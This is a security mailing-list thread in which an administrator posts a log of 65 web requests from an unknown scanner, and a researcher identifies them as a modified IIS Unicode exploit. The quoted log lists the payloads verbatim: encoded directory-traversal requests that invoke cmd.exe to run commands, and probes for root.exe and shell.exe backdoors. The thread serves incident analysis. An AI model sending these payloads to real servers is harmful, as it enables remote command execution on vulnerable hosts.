------------------------------------------------------------------------
----
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts. The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches. Deadline for the best rates is April 25. Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
------------------------------------------------------------------------
----
This is a slightly modified version of the old MS IIS-Unicode exploit, see
here:
http://downloads.securityfocus.com/vulnerabilities/exploits/iis-kabom.ph
p
Reinhard Handwerker
Internet Security Systems
Atlanta, GA
>From: Mark Embrich <mark_embrich (at) yahoo (dot) com [email concealed]>
>To: incidents (at) securityfocus (dot) com [email concealed]
>Subject: New attack or old Vulnerability Scanner?
>
>Hello,
>
>Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
>Note that it also included: "User-Agent:.Mozilla/3.0.
>(compatible;.Indy.Library)...."
>For which my googling tells me that this attack/scanner is probably
>built using Borland Delphi/C++ Builder suite.
>
>I've so far received 3 of these from 2 different IP addresses.
>The first two were from a Comcast cable user.
>The last was from a Cox Communications IP.
>
>Thanks,
>Mark Embrich
>
>0. Scan TCP 80
>1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>3. GET./_vti_bin/.%252e/.%252e/.%252e/.%
>252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%
>63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%
>35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%
>63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>8. GET./_vti_bin/..%255c..%255c..%255c..%255c..%
>255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%
>252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>21. GET./msadc/.%252e/.%252e/.%252e/.%
>252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%
>63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>23. GET./msadc/..%%35%63../..%%35%63../..%%35%
>63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>24. GET./MSADC/..%%35c..%%35c..%%35c..%%
>35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>25. GET./msadc/..%%35c../..%%35c../..%%
>35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%
>63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35%
>63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>28. GET./msadc/..%255c..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>29. GET./msadc/..%255c../..%255c../..%
>255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>30. GET./msadc/..%c0%af../..%c0%af../..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>31. GET./msadc/..%c0%af../..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%
>af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
>33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
>34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
>35. GET./PBServer/..%%35%63..%%35%63..%%35%
>63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>36. GET./PBServer/..%%35c..%%35c..%%
>35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>37. GET./PBServer/..%25%35%63..%25%35%63..%25%35%
>63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>38. GET./PBServer/..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>39. GET./Rpc/..%%35%63..%%35%63..%%35%
>63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>40. GET./Rpc/..%%35c..%%35c..%%
>35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>41. GET./Rpc/..%25%35%63..%25%35%63..%25%35%
>63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>42. GET./Rpc/..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>43. GET./samples/..%255c..%255c..%255c..%255c..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>46. GET./scripts/.%252e/.%
>252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>47. GET./scripts/..%252f..%252f..%252f..%
>252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>48. GET./scripts/..%255c..%
>255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%
>AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%
>1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%
>9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>60. GET./scripts/..%e0%80%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>61. GET./scripts/..%f0%80%80%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>62. GET./scripts/..%f8%80%80%80%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>63. GET./scripts/..%fc%80%80%80%80%
>af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
>64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
>65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..
>
>-----------------------------------------------------------------------
---
--
>Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
>world's premier event for IT and network security experts. The two-day
>Training features 6 hand-on courses on May 12-13 taught by
professionals.
>The two-day Briefings on May 14-15 features 24 top speakers with no
vendor
>sales pitches. Deadline for the best rates is April 25. Register today
to
>ensure your place. http://www.securityfocus.com/BlackHat-incidents
>-----------------------------------------------------------------------
---
--
>
>
------------------------------------------------------------------------
----
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts. The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches. Deadline for the best rates is April 25. Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
------------------------------------------------------------------------
----
[ reply ]